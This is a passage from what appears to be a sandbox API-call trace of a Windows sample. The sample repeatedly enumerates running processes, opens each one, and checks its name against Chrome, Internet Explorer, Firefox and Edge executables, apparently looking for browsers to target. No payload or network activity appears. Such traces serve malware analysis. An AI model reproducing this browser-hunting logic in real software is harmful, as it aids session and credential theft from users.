	[0223.898] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0223.899] CloseHandle (hObject=0x4fd0) returned 1
	[0223.899] Sleep (dwMilliseconds=0x64) 
	[0224.003] GetCurrentProcessId () returned 0x110
	[0224.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0224.007] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0224.009] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0224.010] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0224.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x58ac
	[0224.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.012] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.012] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.013] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.013] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.014] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.015] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x58b0
	[0224.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.015] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.016] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.016] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.018] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.018] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0224.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x58b4
	[0224.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.019] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0224.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.019] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.019] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0224.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.020] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0224.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x58b8
	[0224.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.021] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0224.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.021] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.021] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0224.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.022] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0224.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x58bc
	[0224.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.023] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0224.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.023] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.024] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0224.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.024] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0224.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x58c0
	[0224.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.026] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0224.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.026] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.026] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0224.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.027] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.027] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0224.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x58c4
	[0224.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.028] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0224.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.028] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.028] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0224.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.029] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.029] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0224.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x58c8
	[0224.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.030] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.030] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.030] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.030] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.031] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.031] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x58cc
	[0224.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.031] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.032] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.033] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.033] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.033] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x58d0
	[0224.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.034] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.034] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.035] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.035] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.035] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x58d4
	[0224.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.036] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.036] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.037] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.037] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x58d8
	[0224.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.038] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.038] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.039] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.039] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.039] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x58dc
	[0224.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.040] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.040] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.041] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.041] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x58e0
	[0224.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.042] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.043] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.043] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.043] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x58e4
	[0224.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.044] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.045] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.045] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.045] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.045] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0224.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x58e8
	[0224.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.046] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0224.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.047] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.047] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0224.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.047] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.047] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.049] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x58ec
	[0224.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.049] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.050] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.050] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.050] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.050] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0224.051] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x58f0
	[0224.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.051] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.052] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.052] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.052] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.053] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.053] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0224.054] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x58f4
	[0224.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.054] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0224.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.055] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.055] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0224.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.055] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.055] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0224.056] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x58f8
	[0224.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.056] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0224.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.057] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.057] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0224.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.057] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.057] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0224.058] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x58fc
	[0224.058] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.058] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0224.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.059] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.059] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0224.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.059] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.059] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0224.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5900
	[0224.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.060] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0224.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.061] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.061] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0224.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.061] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.061] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0224.062] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5904
	[0224.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.062] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0224.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.062] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.063] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0224.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.063] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0224.063] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0224.064] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5908
	[0224.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.064] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0224.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.065] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0224.065] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0224.065] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
